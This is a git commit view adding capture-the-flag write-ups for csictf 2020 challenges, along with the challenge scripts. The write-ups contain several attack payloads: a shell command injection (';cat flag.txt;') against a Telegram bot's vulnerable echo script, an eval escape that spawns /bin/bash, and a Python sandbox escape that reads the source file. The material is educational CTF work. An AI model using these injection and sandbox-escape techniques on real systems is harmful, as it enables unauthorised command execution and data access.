rishitsaiya
4 years ago
11 changed files with 556 additions and 0 deletions
@ -0,0 +1,34 @@ |
|||||
|
## BroBot |
||||
|
The main idea finding the flag is just using Bot to get the flag. |
||||
|
|
||||
|
#### Step-1: |
||||
|
I tried `/about` to get information about the bot and got this: |
||||
|
|
||||
|
```python |
||||
|
CTF - https://ctf.csivit.com/ |
||||
|
Our Team - https://ctftime.org/team/77170/ |
||||
|
Homepage - https://csivit.com/ |
||||
|
Contribute - https://github.com/alias-rahil/speakingbot.git/ |
||||
|
CTF Support - https://discord.com/invite/9wHPB2B/ |
||||
|
BoT Support - @alias_rahil |
||||
|
``` |
||||
|
#### Step-2: |
||||
|
I used `/text2voice`. I linked to the source of the bot. It writes our text as `arg` for `echo` in a bash script. Then pipes the script's output to `espeak` to get the sound. |
||||
|
|
||||
|
#### Step-3: |
||||
|
I got this from [writeup](https://github.com/goswami-rahul/ctf/tree/master/csictf2020/brobot) to execute. |
||||
|
|
||||
|
```bash |
||||
|
fs = open(f"/home/ctf/{update.message.from_user.id}", "w") |
||||
|
fs.write(f"echo '{text}'") |
||||
|
fs.close() |
||||
|
os.system( |
||||
|
f"su ctf -c 'sh /home/ctf/{update.message.from_user.id} | espeak -w /home/ctf/{update.message.from_user.id}.wav --stdin'" |
||||
|
) |
||||
|
``` |
||||
|
|
||||
|
Then a simple `';cat flag.txt;'` gives us the answer. |
||||
|
|
||||
|
#### Step-4: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{ai_will_take_over_the_world}` |
After Width: | Height: | Size: 18 KiB |
@ -0,0 +1,84 @@ |
|||||
|
## Escape Plan |
||||
|
The main idea finding the flag is just spawning into a sandbox. |
||||
|
|
||||
|
#### Step-1: |
||||
|
When we run `nc chall.csivit.com 30419`, we are greeted with, |
||||
|
|
||||
|
```bash |
||||
|
Welcome to cipher decoder, an open-source script in python! |
||||
|
|
||||
|
EXAMPLES: |
||||
|
shift_cipher_key('hello', 25) |
||||
|
shift_cipher_bruteforce('hello') |
||||
|
encrypt_vigenere('TEXT', 'KEY') |
||||
|
decrypt_vigenere('DIVD', 'KEY') |
||||
|
|
||||
|
Currently supported ciphers: |
||||
|
shift_cipher_key(text, shift) |
||||
|
shift_cipher_bruteforce(text) |
||||
|
encrypt_vigenere(plaintext, key) |
||||
|
decrypt_vigenere(ciphertext, key) |
||||
|
|
||||
|
To exit: |
||||
|
exit() |
||||
|
|
||||
|
I am constantly trying to make this cipher decoder better and more secure! Help me add support to more ciphers by submitting a PR! |
||||
|
Hope it helps you! |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
So to escape, I tried `eval('__import__("os").system("/bin/bash")')` and I was in. |
||||
|
|
||||
|
Once in I directly checked, `ls -al`, and I got this: |
||||
|
|
||||
|
```bash |
||||
|
total 20 |
||||
|
drwxr-x--- 1 root ctf 4096 Jul 22 06:35 . |
||||
|
drwxr-xr-x 1 root root 4096 Jul 26 16:58 .. |
||||
|
drwxr-x--- 1 root ctf 4096 Jul 22 06:27 .git |
||||
|
-rwxr-x--- 1 root ctf 2654 Jul 22 06:27 crypto.py |
||||
|
-rwxr-x--- 1 root ctf 52 Jul 22 06:27 start.sh |
||||
|
``` |
||||
|
|
||||
|
#### Step-3: |
||||
|
I checked other files, but I will stick to procedure here. Since the description involved a PR, I checked `.git` first by `cd .git`. I got usual files: |
||||
|
|
||||
|
```bash |
||||
|
COMMIT_EDITMSG |
||||
|
HEAD |
||||
|
config |
||||
|
description |
||||
|
hooks |
||||
|
index |
||||
|
info |
||||
|
logs |
||||
|
objects |
||||
|
packed-refs |
||||
|
refs |
||||
|
``` |
||||
|
At this point, I generally check `logs` to get an overview over the changes in the repo, but here the permission was denied. |
||||
|
|
||||
|
#### Step-4: |
||||
|
So, I checked config files by `cat config` and I got this: |
||||
|
|
||||
|
```bash |
||||
|
[core] |
||||
|
repositoryformatversion = 0 |
||||
|
filemode = true |
||||
|
bare = false |
||||
|
logallrefupdates = true |
||||
|
[remote "origin"] |
||||
|
url = https://github.com/alias-rahil/crypto-cli |
||||
|
fetch = +refs/heads/*:refs/remotes/origin/* |
||||
|
[branch "master"] |
||||
|
remote = origin |
||||
|
merge = refs/heads/master |
||||
|
``` |
||||
|
#### Step-4: |
||||
|
Now, I got a URL and checked at the given head and got the flag. |
||||
|
|
||||
|
<img src="Flag.png"> |
||||
|
|
||||
|
#### Step-5: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{2077m4y32_h45_35c4p3d}` |
@ -0,0 +1,226 @@ |
|||||
|
## Friends |
||||
|
The main idea finding the flag is just parsing the input smartly. |
||||
|
|
||||
|
#### Step-1: |
||||
|
When we download `namo.py`, we are greeted with: |
||||
|
|
||||
|
```python |
||||
|
import math |
||||
|
import sys |
||||
|
|
||||
|
def fancy(x): |
||||
|
a = (1/2) * x |
||||
|
b = (1/2916) * ((27 * x - 155) ** 2) |
||||
|
c = 4096 / 729 |
||||
|
d = (b - c) ** (1/2) |
||||
|
e = (a - d - 155/54) ** (1/3) |
||||
|
f = (a + d - 155/54) ** (1/3) |
||||
|
g = e + f + 5/3 |
||||
|
return g |
||||
|
|
||||
|
def notfancy(x): |
||||
|
return x**3 - 5*x**2 + 3*x + 10 |
||||
|
|
||||
|
def mathStuff(x): |
||||
|
if (x < 3 or x > 100): |
||||
|
exit() |
||||
|
|
||||
|
y = fancy(notfancy(x)) |
||||
|
|
||||
|
if isinstance(y, complex): |
||||
|
y = float(y.real) |
||||
|
|
||||
|
y = round(y, 0) |
||||
|
return y |
||||
|
|
||||
|
print("Enter a number: ") |
||||
|
sys.stdout.flush() |
||||
|
x = round(float(input()), 0) |
||||
|
if x == mathStuff(x): |
||||
|
print('Fail') |
||||
|
sys.stdout.flush() |
||||
|
else: |
||||
|
print(open('namo.txt').read()) |
||||
|
sys.stdout.flush() |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
So I tried basic numbers and it worked according to the given algorithm but however, we could try a float `nan` and then I ran it along with the remote server to enter the `else` condition at the end. |
||||
|
|
||||
|
```bash |
||||
|
echo nan | nc chall.csivit.com 30425 |
||||
|
``` |
||||
|
Output: |
||||
|
|
||||
|
```bash |
||||
|
Enter a number: |
||||
|
Mitrooon |
||||
|
bhaiyo aur behno "Enter a number" |
||||
|
mann ki baat nambar |
||||
|
|
||||
|
agar nambar barabar 1 hai { |
||||
|
bhaiyo aur behno "s" |
||||
|
} |
||||
|
|
||||
|
nahi toh agar nambar barabar 13 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 15 hai { |
||||
|
bhaiyo aur behno "5" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 22 hai { |
||||
|
bhaiyo aur behno "4" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 28 hai { |
||||
|
bhaiyo aur behno "k" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 8 hai { |
||||
|
bhaiyo aur behno "y" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 17 hai { |
||||
|
bhaiyo aur behno "4" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 9 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 4 hai { |
||||
|
bhaiyo aur behno "t" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 3 hai { |
||||
|
bhaiyo aur behno "c" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 20 hai { |
||||
|
bhaiyo aur behno "r" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 12 hai { |
||||
|
bhaiyo aur behno "n" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 0 hai { |
||||
|
bhaiyo aur behno "c" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 23 hai { |
||||
|
bhaiyo aur behno "t" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 27 hai { |
||||
|
bhaiyo aur behno "0" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 10 hai { |
||||
|
bhaiyo aur behno "n" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 11 hai { |
||||
|
bhaiyo aur behno "4" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 7 hai { |
||||
|
bhaiyo aur behno "m" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 25 hai { |
||||
|
bhaiyo aur behno "c" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 24 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 6 hai { |
||||
|
bhaiyo aur behno "{" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 16 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 18 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 2 hai { |
||||
|
bhaiyo aur behno "i" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 5 hai { |
||||
|
bhaiyo aur behno "f" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 19 hai { |
||||
|
bhaiyo aur behno "g" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 14 hai { |
||||
|
bhaiyo aur behno "1" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 21 hai { |
||||
|
bhaiyo aur behno "3" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 26 hai { |
||||
|
bhaiyo aur behno "0" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 29 hai { |
||||
|
bhaiyo aur behno "}" |
||||
|
} |
||||
|
|
||||
|
nahi toh { |
||||
|
bhaiyo aur behno "" |
||||
|
} |
||||
|
|
||||
|
achhe din aa gaye |
||||
|
``` |
||||
|
|
||||
|
#### Step-3: |
||||
|
Simple substitution like 0=c, 1=s, 2=i in the context of flag like `csictf{`, would also work. Instead I got this script to get the flag. |
||||
|
|
||||
|
```bash |
||||
|
echo nan | nc chall.csivit.com 30425 | grep -A1 'hai {' | sed 's/agar nambar barabar //' | sed 's/nahi toh //' | sed 's/ hai {$/ =/' | sed 's/^\tbhaiyo aur behno \"//' | sed 's/\"$//' | sed 's/--//' | sed ':a;N;$!ba;s/=\n/ /g' | sort -n | uniq | awk '{print $2}' | tr -d '\n'; echo '' |
||||
|
``` |
||||
|
This is a 1 liner and we get the flag after this. |
||||
|
|
||||
|
#### Step-5: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{my_n4n_15_4_gr34t_c00k}` |
@ -0,0 +1,38 @@ |
|||||
|
import math |
||||
|
import sys |
||||
|
|
||||
|
def fancy(x): |
||||
|
a = (1/2) * x |
||||
|
b = (1/2916) * ((27 * x - 155) ** 2) |
||||
|
c = 4096 / 729 |
||||
|
d = (b - c) ** (1/2) |
||||
|
e = (a - d - 155/54) ** (1/3) |
||||
|
f = (a + d - 155/54) ** (1/3) |
||||
|
g = e + f + 5/3 |
||||
|
return g |
||||
|
|
||||
|
def notfancy(x): |
||||
|
return x**3 - 5*x**2 + 3*x + 10 |
||||
|
|
||||
|
def mathStuff(x): |
||||
|
if (x < 3 or x > 100): |
||||
|
exit() |
||||
|
|
||||
|
y = fancy(notfancy(x)) |
||||
|
|
||||
|
if isinstance(y, complex): |
||||
|
y = float(y.real) |
||||
|
|
||||
|
y = round(y, 0) |
||||
|
return y |
||||
|
|
||||
|
print("Enter a number: ") |
||||
|
sys.stdout.flush() |
||||
|
x = round(float(input()), 0) |
||||
|
if x == mathStuff(x): |
||||
|
print('Fail') |
||||
|
sys.stdout.flush() |
||||
|
else: |
||||
|
print(open('namo.txt').read()) |
||||
|
sys.stdout.flush() |
||||
|
|
@ -0,0 +1,51 @@ |
|||||
|
## Machine Fix |
||||
|
The main idea finding the flag is just understanding the algorithm. |
||||
|
|
||||
|
#### Step-1: |
||||
|
|
||||
|
After I downloaded `code.py`, I tried to understand the workflow here: |
||||
|
|
||||
|
```python |
||||
|
def convert (n): |
||||
|
if n == 0: |
||||
|
return '0' |
||||
|
nums = [] |
||||
|
while n: |
||||
|
n, r = divmod(n, 3) |
||||
|
nums.append(str(r)) |
||||
|
return ''.join(reversed(nums)) |
||||
|
|
||||
|
count=0 |
||||
|
n=1 |
||||
|
while(n<=523693181734689806809285195318): |
||||
|
str1=convert(n) |
||||
|
str2=convert(n-1) |
||||
|
str2='0'*(len(str1)-len(str2))+str2 |
||||
|
for i in range(len(str1)): |
||||
|
if(str1[i]!=str2[i]): |
||||
|
count+=1 |
||||
|
n+=1 |
||||
|
|
||||
|
print(count) |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
For every number n, n and n - 1 are converted to base 3 & then, the program compare the digits, the number of differences is added to total. |
||||
|
|
||||
|
So I wrote a simple `flag.py` script to get flag: |
||||
|
|
||||
|
```python |
||||
|
def flag(n): |
||||
|
sum = 0 |
||||
|
while (n > 0): |
||||
|
sum += n |
||||
|
n //= 3 |
||||
|
return sum |
||||
|
|
||||
|
print(flag(523693181734689806809285195318)) |
||||
|
``` |
||||
|
On running it by `python3 flag.py` |
||||
|
|
||||
|
#### Step-3: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{785539772602034710213927792950}` |
@ -0,0 +1,21 @@ |
|||||
|
def convert (n): |
||||
|
if n == 0: |
||||
|
return '0' |
||||
|
nums = [] |
||||
|
while n: |
||||
|
n, r = divmod(n, 3) |
||||
|
nums.append(str(r)) |
||||
|
return ''.join(reversed(nums)) |
||||
|
|
||||
|
count=0 |
||||
|
n=1 |
||||
|
while(n<=523693181734689806809285195318): |
||||
|
str1=convert(n) |
||||
|
str2=convert(n-1) |
||||
|
str2='0'*(len(str1)-len(str2))+str2 |
||||
|
for i in range(len(str1)): |
||||
|
if(str1[i]!=str2[i]): |
||||
|
count+=1 |
||||
|
n+=1 |
||||
|
|
||||
|
print(count) |
@ -0,0 +1,8 @@ |
|||||
|
def flag(n): |
||||
|
sum = 0 |
||||
|
while (n > 0): |
||||
|
sum += n |
||||
|
n //= 3 |
||||
|
return sum |
||||
|
|
||||
|
print(flag(523693181734689806809285195318)) |
After Width: | Height: | Size: 156 KiB |
@ -0,0 +1,15 @@ |
|||||
|
## No DIStractions |
||||
|
The main idea finding the flag is getting the flag from Discord Bot. |
||||
|
|
||||
|
#### Step-1: |
||||
|
|
||||
|
The tag `Discord` clearly implies that you have to check something out there. So, I went to misc channel and checked out this bot called `Kuwu`. |
||||
|
|
||||
|
#### Step-2: |
||||
|
After trying `flag`, `./flag`, etc., it worked on `.flag`. |
||||
|
|
||||
|
<img src ="Flag.png"> |
||||
|
|
||||
|
#### Step-3: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{m0r3_huMaN_than_Y0u}` |
@ -0,0 +1,79 @@ |
|||||
|
## Prison Break |
||||
|
The main idea finding the flag is just escaping Python Sandbox. |
||||
|
|
||||
|
#### Step-1: |
||||
|
After I ran `nc chall.csivit.com 30407`, we get this a python sandbox. |
||||
|
|
||||
|
I tried various commands like flag and ctf and all, but nothing worked. |
||||
|
|
||||
|
#### Step-2: |
||||
|
Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/ |
||||
|
|
||||
|
#### Step-3: |
||||
|
There I got this 1 liner to escape the sandbox. |
||||
|
|
||||
|
**Payload:** |
||||
|
```python |
||||
|
print(().__class__.__bases__[0].__subclasses__()[40](__file__).read()) |
||||
|
``` |
||||
|
|
||||
|
I got the source code, which had the flag. |
||||
|
|
||||
|
```python |
||||
|
#!/usr/bin/python |
||||
|
|
||||
|
import sys |
||||
|
|
||||
|
class Sandbox(object): |
||||
|
def execute(self, code_string): |
||||
|
exec(code_string) |
||||
|
sys.stdout.flush() |
||||
|
|
||||
|
sandbox = Sandbox() |
||||
|
|
||||
|
_raw_input = raw_input |
||||
|
|
||||
|
main = sys.modules["__main__"].__dict__ |
||||
|
orig_builtins = main["__builtins__"].__dict__ |
||||
|
|
||||
|
builtins_whitelist = set(( |
||||
|
#exceptions |
||||
|
'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception', |
||||
|
|
||||
|
#constants |
||||
|
'False', 'None', 'True', |
||||
|
|
||||
|
#types |
||||
|
'basestring', 'bytearray', 'bytes', 'complex', 'dict', |
||||
|
|
||||
|
#functions |
||||
|
'abs', 'bin', 'dir', 'help' |
||||
|
|
||||
|
# blocked: eval, execfile, exit, file, quit, reload, import, etc. |
||||
|
)) |
||||
|
|
||||
|
for builtin in orig_builtins.keys(): |
||||
|
if builtin not in builtins_whitelist: |
||||
|
del orig_builtins[builtin] |
||||
|
|
||||
|
print("Find the flag.") |
||||
|
sys.stdout.flush() |
||||
|
|
||||
|
def flag_function(): |
||||
|
flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}" |
||||
|
|
||||
|
while 1: |
||||
|
try: |
||||
|
sys.stdout.write(">>> ") |
||||
|
sys.stdout.flush() |
||||
|
code = _raw_input() |
||||
|
sandbox.execute(code) |
||||
|
|
||||
|
except Exception: |
||||
|
print("You have encountered an error.") |
||||
|
sys.stdout.flush() |
||||
|
``` |
||||
|
|
||||
|
#### Step-4: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}` |
Loading…
Reference in new issue